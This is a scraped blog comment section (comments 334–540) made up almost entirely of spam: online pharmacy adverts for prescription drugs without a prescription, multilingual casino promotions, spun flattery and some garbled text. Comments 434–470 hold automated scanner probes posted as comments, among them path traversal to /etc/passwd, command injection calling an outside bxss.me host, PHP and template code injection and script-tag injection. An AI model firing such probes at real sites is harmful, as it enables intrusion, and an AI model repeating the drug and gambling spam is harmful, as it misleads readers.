  cost calcitriol 0.25mg order fenofibrate 160mg sale tricor 160mg oral

 334. muddy says:

  Spinning the reels 50 times at a brick-and-mortar New Zealand casino would do a number on your arm. Thankfully, with an online casino, the worst you’ll have to do is click the mouse over and over. And most real money online casinos have an auto-spin feature, so it’s likely that you won’t even have to do that much! Jackpot City: Attractive deposit promotions Casino giants have now been eyeing Japan since very first reports about the country planning to start its market for casino gambling emerged several years ago, so more wins can be triggered using the same spin. The possibilities of hitting a set plus hand are roughly one in four, players don’t need to present a special sign up promo code to unlock this offer. Here at FreeSpinny, we love nothing more than finding a top no deposit bonus code just like this exclusive bonus from Lucky Creek Casino. If you like this, you may want to check out some of our other category pages and casino reviews including free spins, no deposit bonuses, slots bonuses and real money bonus codes. Also, look out for special promotions and bonus spins given out by your favourite casinos.
  http://www.specterkorea.com/bbs/board.php?bo_table=free&wr_id=4261
  The Ute Mountain Utes offer a complete gaming experience at the Ute Mountain Casino Hotel in Towaoc, Colorado. Located along the Trail of the Ancients scenic and historic byway, the casino is well-placed for both gamers and history enthusiasts looking for fun. The perennial favorites of blackjack, bingo, Kino, poker and slots are ample, as are a number of events and acts held year-round. The on-grounds hotel, pottery factory, RV sites and the full-service Kuchu’s Restaurant make the Ute Mountain Casino Hotel a vacation destination unto itself. Instead, Trump told lawmakers that organized crime “is rampant — I don’t mean a little bit — is rampant on Indian reservations.” He predicted “one of the biggest scandals since Al Capone.” Then came the line that many Native Americans would remember for decades: that the federally recognized Connecticut tribe that owned Foxwoods — the Mashantucket Pequots — did not look like real Indians.

 335. What’s up i am kavin, its my first time to commenting anywhere, when i read this post i thought i could also make comment due to this sensible article.

 336. boart says:

  Всички дебютанти в сферата на хазартните игри имат възможност да изпитат техните възможности и да научат правилата като се възползват от опцията да играят безплатно и без регистрация демо версии на всички разнообразни казино игри включени в каталога на Palms Bet casino. Както можете да се досетите, големият избор от игри отвежда този букмейкър на едно от челните места сред останалите хазартни компании. В следващите редове ще се опитаме да ви запознаем по-подробно с видовете игри, които компанията предлага и как да се възползвате по максимален начин от тях.
  https://www.bookmarkingqueen.win/pari-ot-igri-s-naj-niskite-depoziti
  Игрите са разделени на няколко подкатегории, като разбира се, има игри с плодове (сред които 20 super hot, 40 super hot, burning hot) и много други с 20 линии, 40 линии и 100 линии за печалби. Голяма част от игрите са част от прогресивни джакпоти, които освен печалби, носят и безплатни врътки под формата на бонуси. Важна подробност е, че може да играете безплатни казино игри (в демо версия) в Уинбет Казино. Skrill е платформа за онлайн плащания и парични преводи, който съществува от 2001 г. Клиентите могат да финансират своите казино портфейли, като използват функциите, които Skrill предлага. В сравнение с други услуги, Skrill се откроява с ниските си транзакции и стабилна надеждност за правене на депозити, тегления и трансфери.

 337. Agede says:

  Όπως αναφέρθηκε ήδη πολλά είναι τα καζίνο που αποδέχονται την paysafecard ως μία από τις μεθόδους πληρωμών τους. Ακολουθεί μία λίστα από τα πιο αξιόπιστα καζίνο που είναι διαθέσιμα στο διαδίκτυο και τα οποία αποδέχονται την paysafecard ως μέθοδο κατάθεσης χρημάτων και ανάληψης κερδών. Τώρα είστε έτοιμοι να κάνετε πραγματικά στοιχήματα. Αλλά να είστε προσεκτικοί, να διαχειρίζεστε καλά το bankroll σας, να ξεκινάτε με μικρά στοιχήματα. Διαφορετικά, σύντομα θα ξεμείνετε από χρήματα και θα απογοητευτείτε.
  http://www.aldea.co.kr/board/bbs/board.php?bo_table=free&wr_id=243177
  Το αναφέραμε και ανωτέρω. Το paysafe wallet είναι κάτι περισσότερο από εύκολο για να «γεμίσει» με χρήματα. Η Fonbet μεριμνά για την άνεση των παικτών και προσφέρει πλήθος διαφορετικών τρόπων εκτέλεσης για την κάθε συναλλαγή. Μπορείτε να πραγματοποιήσετε τις συναλλαγές σας εύκολα και γρήγορα, με τους εξής τρόπους: Paysafe, πιστωτικής χρεωστικής κάρτας, τραπεζικό έμβασμα, Neteller Skrill Viva. Είναι μία πάρα πολύ απλή διαδικασία. Δείτε εδώ και μεταβείτε στην σελίδα για να ακολουθήσετε τις σύντομες οδηγίες και να αποκτήσετε το δικό σας myPaysafecard.

 338. Non says:

  Exercise files, including required data and apps at the start and end of the build, are available here – link.freefall365 canvasappsfiles. The latest racing odds are on PaddyPower now In this episode, I’ll demonstrate how to create and close an opportunity as Won in one action when the form mode is new, and it has no concept of the opportunity ID. In doing so, we will learn about the Patch and Defaults functions and how to we can add the resulting record of the Patch function to a Collection. Exercise files, including required data and apps at the start and end of the build, are available here – link.freefall365 canvasappsfiles. 1 – Ahorsewithnoname (7 1)2 – Calling The Wind (15 2)3 – Tritonic (20 1)4 – Law Of The Sea (8 1)5 – Weston (28 1)6 – Zoffee (16 1)
  https://madesocials.com/story413359/ladbrokes-joining-bonus
  If your phone has little or insufficient memory to run the 1Win India app, your best bet is to use the mobile website. There is virtually no difference between the mobile and PC sites. Everything you can do on your desktop can just as easily be done on your phone. The main product offered in the mobile app is sports betting, and the layout and orientation of the app allow for convenient betting. Increase your fictitious bankroll and take the opportunity to create strategies for winning with real values. You should only withdraw money into your own e-wallets, as per the 1win Terms and Conditions. You may make your first deposit as soon as you register at 1win, and you actually have to fund your account before you may begin to play at 1win site. You don’t have to wait for your identity verification procedure to be completed before doing that.

 339. Howdy just wanted to give you a quick heads up and let you know a few of the images aren’t loading correctly. I’m not sure why but I think its a linking issue. I’ve tried it in two different internet browsers and both show the same results.

 340. GPCR says:

  ChemDiv’s Screening Libraries have been extensively validated
  both in our in-house biological assays and in the laboratories of over 200 external
  partners including Pharma, Biotech, Academia and Screening Centers in the U.S., Europe, and Japan. We offer
  a shelf-available set of over 1.6 M individual solid compounds.

 341. daachnik.ru says:

  My brother suggested I would possibly like this blog. He was totally right. This submit actually made my day. You cann’t believe just how much time I had spent for this information! Thank you!

 342. Thank you for some other informative blog. Where else may just I am getting that kind of info written in such a perfect way? I have a undertaking that I am simply now operating on, and I have been at the glance out for such information.

 343. Have you ever thought about publishing an e-book or guest authoring on other websites? I have a blog based upon on the same information you discuss and would really like to have you share some stories/information. I know my audience would value your work. If you are even remotely interested, feel free to send me an e-mail.

 344. daachkaru says:

  Hi there, I enjoy reading all of your post. I like to write a little comment to support you.

 345. xxxvideox says:

  My brother suggested I would possibly like this blog. He was totally right. This submit actually made my day. You cann’t believe just how much time I had spent for this information! Thank you!

 346. JimmyGep says:

  buy prednisone online usa: http://prednisone1st.store/# prednisone buy cheap

 347. I am really loving the theme/design of your site. Do you ever run into any internet browser compatibility problems? A handful of my blog visitors have complained about my website not operating correctly in Explorer but looks great in Safari. Do you have any tips to help fix this issue?

 348. Charlesimish says:

  Some are medicines that help people when doctors prescribe.
  reliable canadian online pharmacy trustworthy canadian pharmacy
  What side effects can this medication cause?

 349. Xxpdla says:

  buy generic frumil 5mg buy clindac a gel for sale acyclovir online

 350. Samuelscave says:

  https://mobic.store/# buy cheap mobic

 351. Hi there mates, its enormous piece of writing regarding tutoringand fully explained, keep it up all the time.

 352. LarryCah says:

  amoxicillin without prescription: can you buy amoxicillin uk how to buy amoxicillin online

 353. BrentTar says:

  mens ed pills: ed remedies – ed drug prices

 354. ScottBiomb says:

  online ed pills: erectile dysfunction pills – ed pills

 355. Claudewah says:

  reliable canadian pharmacy best canadian pharmacy online

 356. Ugdnrh says:

  purchase fluoxetine sale naltrexone 50mg ca purchase letrozole generic

 357. CharlesDelia says:

  canadian pharmacy amoxicillin can you purchase amoxicillin online – medicine amoxicillin 500mg

 358. LarryCah says:

  can i get mobic tablets get generic mobic without insurance where can i buy cheap mobic

 359. Darylraf says:

  https://mobic.store/# how can i get cheap mobic online

 360. Claudewah says:

  canadian valley pharmacy best canadian pharmacy online

 361. Charlesimish says:

  Medscape Drugs & Diseases.
  amoxicillin 500 capsule cost of amoxicillin – purchase amoxicillin online without prescription
  Read information now.

 362. Yesterday, while I was at work, my sister stole my iPad and tested to see if it can survive a 40 foot drop, just so she can be a youtube sensation. My iPad is now broken and she has 83 views. I know this is completely off topic but I had to share it with someone!

 363. sadounik.ru says:

  Hey there! Do you know if they make any plugins to protect against hackers? I’m kinda paranoid about losing everything I’ve worked hard on. Any recommendations?

 364. BrentTar says:

  generic amoxicillin over the counter amoxicillin 500mg tablets price in india – order amoxicillin uk

 365. Jamesacuct says:

  cost propecia for sale order generic propecia pill

 366. LarryCah says:

  canadapharmacyonline legit reliable canadian pharmacy

 367. Claudewah says:

  buying cheap propecia online buying propecia without insurance

 368. Darylraf says:

  https://pharmacyreview.best/# certified canadian international pharmacy

 369. CharlesDelia says:

  cost of amoxicillin prescription amoxicillin 500 mg tablet – amoxicillin 500mg buy online canada

 370. Charlesimish says:

  Prescription Drug Information, Interactions & Side.
  buy ed pills online: best ed pills at gnc – medicine erectile dysfunction
  Some are medicines that help people when doctors prescribe.

 371. LarryCah says:

  mobic tablet where buy cheap mobic online mobic cost

 372. Srmqui says:

  valaciclovir 1000mg us valcivir 1000mg cheap purchase floxin online cheap

 373. Claudewah says:

  best ed drug: ed pills otc – natural ed remedies

 374. Tbymcq says:

  zebeta order terramycin 250 mg uk buy terramycin pills

 375. Freddypayox says:

  ed drugs online from canada: pharmacy canadian superstore – canadian pharmacy

 376. Albertdiree says:

  canadian pharmacy world: legit canadian pharmacy – canada drug pharmacy

 377. Freddypayox says:

  world pharmacy india: mail order pharmacy india – indian pharmacies safe

 378. Albertdiree says:

  mexico drug stores pharmacies: mexican mail order pharmacies – mexico drug stores pharmacies

 379. Freddypayox says:

  mexico drug stores pharmacies: mexico drug stores pharmacies – medication from mexico pharmacy

 380. Albertdiree says:

  prescription drugs canada buy online: canadian pharmacy tampa – canadian world pharmacy

 381. Роскошный частный эротический массаж Москва телефон

 382. Freddypayox says:

  online canadian drugstore: canadian pharmacy review – canadian pharmacies compare

 383. Albertdiree says:

  canadian pharmacy service: safe reliable canadian pharmacy – safe canadian pharmacies

 384. Albertdiree says:

  п»їbest mexican online pharmacies: buying prescription drugs in mexico – medicine in mexico pharmacies

 385. Freddypayox says:

  reputable mexican pharmacies online: mexico drug stores pharmacies – buying prescription drugs in mexico

 386. xnxx zoo says:

  Hurrah! Finally I got a blog from where I know how to actually get useful data regarding my study and knowledge.

 387. RobertVax says:

  https://certifiedcanadapharm.store/# the canadian drugstore

 388. Bdhcny says:

  generic cialis india purchase viagra pill viagra professional

 389. Albertdiree says:

  mexican pharmaceuticals online: mexican border pharmacies shipping to usa – medication from mexico pharmacy

 390. Freddypayox says:

  mexican rx online: medicine in mexico pharmacies – mexican border pharmacies shipping to usa

 391. Jeffreysah says:

  https://stromectolonline.pro/# ivermectin tablets

 392. Buslhe says:

  buy cheap generic ketotifen tofranil 25mg without prescription tofranil pills

 393. Michaelhoirl says:

  can i buy zithromax over the counter zithromax capsules price zithromax for sale 500 mg

 394. BarryLom says:

  https://stromectolonline.pro/# ivermectin 3mg tablets price

 395. Hi outstanding blog! Does running a blog like this take a great deal of work? I have very little knowledge of computer programming but I was hoping to start my own blog soon. Anyways, if you have any suggestions or tips for new blog owners please share. I know this is off topic but I just needed to ask. Appreciate it!

 396. BarryLom says:
 397. Jeffreysah says:

  https://azithromycin.men/# cost of generic zithromax

 398. Qbkoev says:

  minoxidil cost buy generic tamsulosin where can i buy ed pills

 399. BarryLom says:

  https://azithromycin.men/# zithromax 600 mg tablets

 400. When I originally commented I clicked the “Notify me when new comments are added” checkbox and now each time a comment is added I get four emails with the same comment. Is there any way you can remove me from that service? Thanks!

 401. Jeffreysah says:

  https://gabapentin.pro/# neurontin mexico

 402. Qqrjmu says:

  buy precose no prescription buy repaglinide 1mg generic buy fulvicin

 403. Truly no matter if someone doesn’t know after that its up to other people that they will help, so here it happens.

 404. Williamjuiva says:

  paxlovid covid: paxlovid pharmacy – paxlovid for sale

 405. RobertHom says:

  buy antibiotics over the counter: best online doctor for antibiotics – buy antibiotics for uti

 406. Tzwlby says:

  buy aspirin 75 mg generic purchase imiquad for sale imiquimod uk

 407. pet xvideos says:

  hey there and thank you for your information I’ve definitely picked up anything new from right here. I did however expertise a few technical issues using this web site, since I experienced to reload the site a lot of times previous to I could get it to load properly. I had been wondering if your web hosting is OK? Not that I am complaining, but sluggish loading instances times will very frequently affect your placement in google and can damage your high quality score if advertising and marketing with Adwords. Anyway I’m adding this RSS to my e-mail and can look out for a lot more of your respective intriguing content. Make sure you update this again soon.

 408. GeorgePiere says:

  https://misoprostol.guru/# Abortion pills online

 409. Michaeltwing says:

  https://lipitor.pro/# lipitor brand price

 410. daachka.ru says:

  Wow, wonderful blog layout! How long have you been blogging for? you make blogging look easy. The overall look of your web site is fantastic, let alone the content!

 411. Michaeltwing says:

  http://misoprostol.guru/# buy cytotec in usa

 412. GeorgePiere says:

  http://lisinopril.pro/# lisinopril 1.25 mg

 413. Michaeltwing says:

  http://avodart.pro/# order generic avodart without dr prescription

 414. GeorgePiere says:

  https://ciprofloxacin.ink/# where can i buy cipro online

 415. Gplfgx says:

  buy dipyridamole 100mg pills dipyridamole us pravastatin 20mg generic

 416. Jrzkaw says:

  melatonin 3mg ca buy norethindrone 5mg sale buy danazol sale

 417. Hey there, I think your blog might be having browser compatibility issues. When I look at your blog in Safari, it looks fine but when opening in Internet Explorer, it has some overlapping. I just wanted to give you a quick heads up! Other then that, terrific blog!

 418. bub says:

  In this article, FootballOrbit will use data from the DFML to rank the top 10 richest football clubs in the world in 2023. © 2004-2023 CBS Interactive. All Rights Reserved. So, as a service to the community, I’ve compiled a list of the best 13 14 (that’s right, we’ve got a new addition) places to live for football lovers. The Cambridge University Association Football Club play at the Grange Road Stadium, which is also known as Fenner’s Pitches. The stadium has a seating capacity of just about 1000 people. Alfredo Di Stéfano, the best player of all time Manchester City keep top spot, Liverpool log the biggest jump, and Newcastle United joins the pack. ⚽ Find out more about this year’s 20 highest revenue generating clubs in world football in the latest Deloitte Football Money League: t.co zYmgp7fpxF#DFML2023 pic.twitter u3E0wxLn3h
  https://biolinky.co/funbtickledtio1979
  Man United have won the Premier League a total of 13 times, more than any other side to have taken part in the competition. Their last success however came back in 2013, which was Sir Alex Ferguson’s final season in charge. Dutchman Ten Hag was backed heavily in the Summer window, with Manchester United signing several high-profile names like Casemiro, Antony, Christian Eriksen and Lisandro Martinez to help with the rebuild. After spending a season in the Europa League, Man United qualified for the Champions after finishing third in the Premier League last season.  The Blues have one of the best defenses in the league. Led by 38-year-old defender Thiago Silva, Chelsea have allowed just 42 goals this season. Only Manchester City (31), Newcastle (32) and Manchester United (41) have given up fewer.

 419. Jbqgff says:

  order dydrogesterone 10mg without prescription forxiga 10 mg cost order jardiance 25mg for sale

 420. Rodneycop says:

  brillx скачать бесплатно
  https://brillx-kazino.com
  Вас ждет огромный выбор игровых аппаратов, способных удовлетворить даже самых изысканных игроков. Брилкс Казино знает, как удивить вас каждым спином. Насладитесь блеском и сиянием наших игр, ведь каждый слот — это как бриллиант, который только ждет своего обладателя. Неважно, играете ли вы ради веселья или стремитесь поймать удачу за хвост и выиграть крупный куш, Brillx сделает все возможное, чтобы удовлетворить ваши азартные желания.Играть онлайн бесплатно в игровые аппараты стало еще проще с нашим интуитивно понятным интерфейсом. Просто выберите свой любимый слот и погрузитесь в мир ярких красок и захватывающих приключений. Наши разнообразные бонусы и акции добавят нотку удивительности к вашей игре. К тому же, для тех, кто желает ощутить настоящий азарт, у нас есть возможность играть на деньги. Это шанс попытать удачу и ощутить адреналин, который ищет настоящий игрок.

 421. Georgezerry says:

  buying prescription drugs in mexico online: mexican online pharmacies prescription drugs – mexican pharmaceuticals online

 422. Geri bildirim: fuck google
 423. RNS-MO-Rof says:

  Разрешение на строительство — это государственный акт, выдаваемый авторизованными структурами государственного управления или муниципального руководства, который предоставляет начать стройку или производство строительных операций.
  Разрешение на строительство предписывает правовые положения и условия к строительным работам, включая допустимые категории работ, предусмотренные материалы и техники, а также включает строительные инструкции и пакеты безопасности. Получение разрешения на строительный процесс является обязательным документов для строительной сферы.

 424. Geri bildirim: fuck google
 425. Bxieki says:

  order fludrocortisone 100mcg generic bisacodyl medication loperamide 2 mg pills

 426. WawnJani says:

  the sound of birds chirping in the morning brings a sense of serenity stare Nothing great was ever achieved without enthusiasm

 427. Every weekend i used to visit this web site, as i want enjoyment, since this this site conations really nice funny data too.

 428. It’s awesome in favor of me to have a web site, which is valuable for my knowledge. thanks admin

 429. Hpsjcw says:

  buy etodolac cheap mebeverine pills order cilostazol 100 mg pills

 430. Auuqwg says:

  order prasugrel 10 mg pill prasugrel 10 mg cost order tolterodine for sale

 431. Excellent post. I used to be checking continuously this blog and I am inspired! Very useful information particularly the ultimate phase 🙂 I deal with such info a lot. I used to be seeking this particular info for a long timelong time. Thank you and good luck.

 432. I am extremely impressed with your writing skills and also with the layout on your blog. Is this a paid theme or did you customize it yourself? Either way keep up the nice quality writing, it’s rare to see a nice blog like this one these days.

 433. Pzwunu says:

  ferrous 100mg us actonel us cost sotalol

 434. 1 says:

  555

 435. 1*1 says:

  555

 436. 1 says:

  ../../../../../../../../../../../../../../etc/passwd

 437. 1 says:

  echo smflzw$()\ nuysol\nz^xyu||a #’ &echo smflzw$()\ nuysol\nz^xyu||a #|” &echo smflzw$()\ nuysol\nz^xyu||a #

 438. 1 says:

  $(nslookup hitlksztdmxwz4d7ef.bxss.me||perl -e “gethostbyname(‘hitlksztdmxwz4d7ef.bxss.me’)”)

 439. 1 says:

  12345′”\’\”);|]*{
  ”💡

 440. 1 says:

  555

 441. 1'" says:

  555

 442. 1 says:

  !(()&&!|*|*|

 443. 1 says:

  1*555

 444. 1 says:

  555*904*899*0

 445. 1 says:

  555*493*488*0

 446. 1 says:

  (798-238-5)

 447. 1 says:

  ‘+’A’.concat(70-3).concat(22*4).concat(112).concat(88).concat(118).concat(74)+(require’socket’
  Socket.gethostbyname(‘hitlx’+’bwhavhtu9d568.bxss.me.’)[3].to_s)+’

 448. 1 says:

  @@LQEZu

 449. 1 says:

  “;print(md5(31337));$a=”

 450. 1 says:

  ${@print(md5(31337))}

 451. 1 says:

  ‘”

 452. 9306 says:

  555

 453. 1 says:

  555′”()&%PBoe(9733)

 454. 1 says:

  ‘”()&%PBoe(9179)

 455. 1 says:

  5559003642

 456. 1 says:

  acu9648<s1﹥s2ʺs3ʹuca9648

 457. 1 says:

  acux7285z1z2abcxuca7285

 458. 1 says:

  CWS000x=1N@E߮I)@ HiP”DFG&َ7܂rX;!S̛7Jq.>pclzGܾMdkj,(TJj)”T7$HD6)x)ؒ\C|QNcb b_&5 hg
  ]s0QL

 459. 1 says:

  <th:t="${acx}#foreach

 460. 1 says:

  1}}”}}’}}1%>”%>’%>

 461. 1 says:

  acx{{98991*97996}}xca

 462. 1 says:

  acx[[${98991*97996}]]xca

 463. 1 says:

  acx__${98991*97996}__::.x

 464. 1 says:

  “acxzzzzzzzzbbbccccdddeeexca”.replace(“z”,”o”)

 465. 1 says:

  555PBoe(9004)

 466. 1 says:

  555SNRGR[!+!]

 467. 1 says:

  555PBoe(9342)

 468. 1 says:

  555<ScRIpT>PBoe(9896)</sCrIpT>

 469. 1 says:

  555PBoe(9420)

 470. 1 says:

  555PBoe(9495)

 471. Ippkij says:

  how to get pyridostigmine without a prescription piroxicam 20 mg over the counter buy maxalt 10mg sale

 472. Ghqqxx says:

  brand vasotec 10mg doxazosin 1mg pill buy lactulose

 473. FrancisRounc says:

  best online canadian pharmacy: canada drugs direct – canadianpharmacyworld com

 474. FrancisRounc says:

  mexican drugstore online: buying prescription drugs in mexico – medicine in mexico pharmacies

 475. Ksmlwd says:

  buy zovirax eye drop buy generic xalatan over the counter buy exelon for sale

 476. FrancisRounc says:

  canada drugstore pharmacy rx: best canadian online pharmacy – canadian pharmacy world

 477. scholding says:

  Быстровозводимые здания – это прогрессивные конструкции, которые отличаются повышенной быстротой возведения и гибкостью. Они представляют собой здания, заключающиеся из заранее сделанных деталей или узлов, которые имеют возможность быть быстрыми темпами установлены в районе стройки.
  Купить здание из сэндвич панелей владеют гибкостью и адаптируемостью, что позволяет просто менять а также адаптировать их в соответствии с нуждами покупателя. Это экономически лучшее и экологически стойкое решение, которое в последние годы приняло маштабное распространение.

 478. When someone writes an post he/she keeps the idea of a user in his/her mind that how a user can know it. So that’s why this piece of writing is great. Thanks!

 479. Zszcvo says:

  premarin 0.625mg sale viagra for sale online sildenafil in usa

 480. Howdy would you mind letting me know which hosting company you’re working with? I’ve loaded your blog in 3 completely different internet browsers and I must say this blog loads a lot quicker then most. Can you suggest a good internet hosting provider at a reasonable price? Thank you, I appreciate it!

 481. Vuxkxm says:

  buy prilosec 10mg pill purchase prilosec for sale metoprolol canada

 482. GillNuse says:

  generic viagra online for sale natural alternative to viagra cheap generic viagra

 483. I love your blog.. very nice colors & theme. Did you design this website yourself or did you hire someone to do it for you? Plz reply as I’m looking to create my own blog and would like to know where u got this from. kudos

 484. jem says:

  Jak wiadomo hazard jest brudnym i nieetycznym biznesem (choć coraz częściej kojarzy się z garniturami niż kijami bejsbolowymi), dlatego od kasyn, zwłaszcza internetowych nie powinniśmy oczekiwać uczciwości. Istnieje duże prawdopodobieństwo, że oprogramowania jaskiń hazardu ustawiane są w taki sposób, żeby wciągnąć delikwenta w grę, pozwalając mu na początku wygrywać, a następnie rozpoznać jakim systemem się posługuje i dopasować do niego algorytm. Oczywiście nie ma co doszukiwać się teorii spiskowych, bo i bez manipulowania przy oprogramowaniu kasyno w końcu pozbawi gracza wpłaconych środków, ale warto pamiętać kto stoi z drugiej strony monitora. Profesional system To system najprostszy i najbardziej rozpowszechniony system, zwany również systemem podwajania stawki. Na czym on polega? Po pierwsze, ma on zastosowanie wyłącznie przy zakładach, w których mamy tylko dwie możliwości wyboru i teoretyczną szanse na wygraną w okolicach 50%: czerwone czarne, parzyste nieparzyste, niskie wysokie. Po drugie – w przypadku przegrania pierwszego zakładu, podwajamy stawkę. Oczywiście nieistotne jest, czy obstawimy tak samo, czy przeciwnie – przecież szansę mamy cały czas w wysokości 50%. Po trzecie – podwajamy stawkę tak długo, aż wreszcie wygramy. Wówczas jesteśmy do przodu o jeden, początkowy zakład.
  https://doctorbookmark.com/story15097694/box24-free-spins-south-african
  Ps: Jak w przypadku każdej gry planszowej bardzo polecam uważne porównywanie cenników. Z naszych internetowych poszukiwań wynika, że cena gry potrafi się w zależności od miejsca gdzie się ją kupuje różnić nawet o 50 zł, co przy grze która kosztuje ok. 120 zł jest sporą różnicą. W każdym wypadku szansa na zwycięstwo nie wynosi nigdy 100%. Najważniejsze jednak, żeby trzymać się wybranego podejścia. Nie możemy zrezygnować w połowie drogi, gdyż zarówno rynek, jak i karty są kapryśne. W końcu jednak liczby i prawdopodobieństwo zaczną grać na naszą korzyść. Jestem przekonany, że jak by udostępnili api, aby móc z nim grać, możńa napisać “anty AI” które rozpyka go (no włąsnie zależy teraz od dynamiki przystosowaywania się do agresji, bo zależy to od tego ilu i jak bardzo agresywnych pasywnych jest graczy przy stole)

 485. Rcncge says:

  buy generic micardis buy plaquenil cheap purchase molnunat generic

 486. We stumbled over here different website and thought I might check things out. I like what I see so now i’m following you. Look forward to looking over your web page for a second time.

 487. Bqwcte says:

  cialis 5mg oral cialis 20mg sale order viagra generic

 488. DennisGainc says:

  canadian drug pharmacy: CIPA certified canadian pharmacy – trusted canadian pharmacy

 489. Sohquw says:

  buy cenforce 50mg generic cenforce 100mg pills buy aralen generic

 490. MathewDuarm says:

  Anna Berezina is a renowned originator and demagogue in the field of psychology. With a family in clinical psychology and extensive study involvement, Anna has dedicated her craft to arrangement lenient behavior and daft health: https://thomassen-dencker.mdwrite.net/fine-art-with-anna-berezina-exploring-the-beauty-of-creativity-1694618678. Middle of her between engagements, she has мейд impressive contributions to the field and has become a respected meditation leader.

  Anna’s skill spans several areas of emotions, including cognitive psychology, favourable looney, and ardent intelligence. Her extensive education in these domains allows her to stock up valuable insights and strategies in return individuals seeking personal proliferation and well-being.

  As an initiator, Anna has written several leading books that have garnered widespread attention and praise. Her books put up for sale practical suggestion and evidence-based approaches to forbear individuals clear the way fulfilling lives and evolve resilient mindsets. Away combining her clinical expertise with her passion suited for portion others, Anna’s writings procure resonated with readers all the world.

 491. MathewDuarm says:

  Anna Berezina is a renowned inventor and keynoter in the deal with of psychology. With a offing in clinical psychology and extensive probing experience, Anna has dedicated her career to agreement human behavior and unbalanced health: http://mindlentil44.jigsy.com/entries/general/Anna-Berezina-Accountant–Expert-Financial-Services. By virtue of her achievement, she has made important contributions to the battleground and has fit a respected meditation leader.

  Anna’s expertise spans a number of areas of emotions, including cognitive disturbed, favourable non compos mentis, and emotional intelligence. Her extensive facts in these domains allows her to produce valuable insights and strategies as individuals seeking in person growth and well-being.

  As an originator, Anna has written several influential books that cause garnered widespread notice and praise. Her books offer mundane information and evidence-based approaches to forbear individuals decoy fulfilling lives and reveal resilient mindsets. Through combining her clinical dexterity with her passion quest of dollop others, Anna’s writings secure resonated with readers for everyone the world.

 492. DennisGainc says:

  mexican pharmaceuticals online: mexican border pharmacies shipping to usa – mexican online pharmacies prescription drugs

 493. Hey there would you mind stating which blog platform you’re working with? I’m looking to start my own blog in the near future but I’m having a tough time choosing between BlogEngine/Wordpress/B2evolution and Drupal. The reason I ask is because your design and style seems different then most blogs and I’m looking for something completely unique. P.S Apologies for getting off-topic but I had to ask!

 494. It’s very trouble-free to find out any topic on net as compared to books, as I found this piece of writing at this website.

 495. Uoglxh says:

  buy provigil for sale buy prednisone 5mg for sale buy generic prednisone 20mg

 496. I love reading through a post that will make people think. Also, thanks for allowing me to comment!

 497. I’m gone to tell my little brother, that he should also pay a visit this website on regular basis to get updated from most up-to-date reports.

 498. Icumgl says:

  order cefdinir generic lansoprazole 15mg price prevacid order

 499. Gwjhxl says:

  order absorica pills zithromax usa azithromycin 250mg cost

 500. You really make it seem so easy with your presentation however I find this topic to be really something which I think I would never understand. It sort of feels too complicated and very wide for me. I am looking forward in your next publish, I will try to get the hold of it!

 501. Geri bildirim: fuck
 502. Hello there! Do you know if they make any plugins to protect against hackers? I’m kinda paranoid about losing everything I’ve worked hard on. Any suggestions?

 503. ArchieBog says:

  https://farmaciabarata.pro/# farmacia online envГ­o gratis

 504. I always spent my half an hour to read this webpage’s articles every day along with a cup of coffee.

 505. Pmyczn says:

  buy generic azipro order omnacortil 10mg generic buy neurontin 800mg online

 506. ArchieBog says:

  https://farmaciaonline.men/# comprare farmaci online con ricetta

 507. Pacrfz says:

  oral lipitor 10mg proventil drug amlodipine buy online

 508. ArchieBog says:

  https://farmaciabarata.pro/# farmacia envГ­os internacionales

 509. Geri bildirim: porn
 510. WOW just what I was searching for. Came here by searching
  for Hair loss and scalp exfoliation

 511. whoah this blog is wonderful i really like reading your articles. Stay up the good work! You know, a lot of individuals are searching around for this info, you can help them greatly.

 512. This is a topic that’s close to my heart… Take care! Where are your contact details though?

 513. RickeySob says:

  п»їpharmacie en ligne – п»їpharmacie en ligne

 514. BillyOrara says:

  http://esfarmacia.men/# farmacias online baratas

 515. Pretty great post. I simply stumbled upon your blog and wanted to mention that I have really enjoyed browsing your blog posts. In any case I’ll be subscribing in your feed and I hope you write again soon!

 516. Vlcwye says:

  buy protonix 40mg pills buy phenazopyridine generic pyridium 200 mg over the counter

 517. Appreciating the time and energy you put into your site and in depth information you provide. It’s awesome to come across a blog every once in a while that isn’t the same outdated rehashed material. Excellent read! I’ve saved your site and I’m including your RSS feeds to my Google account.

 518. RickeySob says:

  farmacias online baratas: Sildenafilo precio – farmacia envГ­os internacionales

 519. Hadawr says:

  blackjack online real money buy albuterol 2mg online order ventolin online cheap

 520. I absolutely love your blog and find most of your post’s to be what precisely I’m looking for. Does one offer guest writers to write content available for you? I wouldn’t mind producing a post or elaborating on many of the subjects you write about here. Again, awesome web log!

 521. Write more, thats all I have to say. Literally, it seems as though you relied on the video to make your point. You clearly know what youre talking about, why waste your intelligence on just posting videos to your blog when you could be giving us something enlightening to read?

 522. Zkvgus says:

  online slots real money usa blackjack online free stromectol cvs

 523. Unquestionably believe that which you stated. Your favorite justification appeared to be on the net the simplest thing to be aware of. I say to you, I definitely get irked while people consider worries that they plainly do not know about. You managed to hit the nail upon the top and also defined out the whole thing without having side effect , people can take a signal. Will likely be back to get more. Thanks

 524. RogerUplig says:

  Every visit reaffirms why I choose this pharmacy. mexican border pharmacies shipping to usa: mexican rx online – buying from online mexican pharmacy

 525. Felixethen says:

  best canadian pharmacy online: reputable canadian online pharmacy – pharmacy canadian

 526. Ohwxvl says:

  cost amantadine buy atenolol 100mg pills buy dapsone pill

 527. Vunyft says:

  vegas casino online buy synthroid generic order synthroid 150mcg pill

 528. RogerUplig says:

  Generic Name. indian pharmacy online: online pharmacy india – indianpharmacy com

 529. Felixethen says:

  india pharmacy mail order: best india pharmacy – online pharmacy india

 530. Currently it looks like Expression Engine is the best blogging platform out there right now. (from what I’ve read) Is that what you’re using on your blog?

 531. RogerUplig says:

  They keep a broad spectrum of rare medications. onlinecanadianpharmacy 24: my canadian pharmacy reviews – canadian valley pharmacy

 532. Felixethen says:

  indianpharmacy com: top online pharmacy india – best india pharmacy

 533. Eypiua says:

  brand clomid 100mg purchase clomid generic buy imuran 50mg sale

 534. What’s up mates, pleasant post and good arguments commented here, I am actually enjoying by these.

 535. Онлайн казино радует своих посетителей более чем двумя тысячами увлекательных игр от ведущих разработчиков.

 536. RogerUplig says:

  They have a fantastic range of supplements. mexican online pharmacies prescription drugs: buying from online mexican pharmacy – п»їbest mexican online pharmacies

 537. Aaywua says:

  methylprednisolone tablets methylprednisolone over the counter buy triamcinolone without a prescription

 538. Felixethen says:

  top 10 pharmacies in india: buy prescription drugs from india – india online pharmacy

 539. You’ve made some decent points there. I looked on the web for more info about the issue and found most individuals will go along with your views on this website.

 540. MichaelSnugh says:

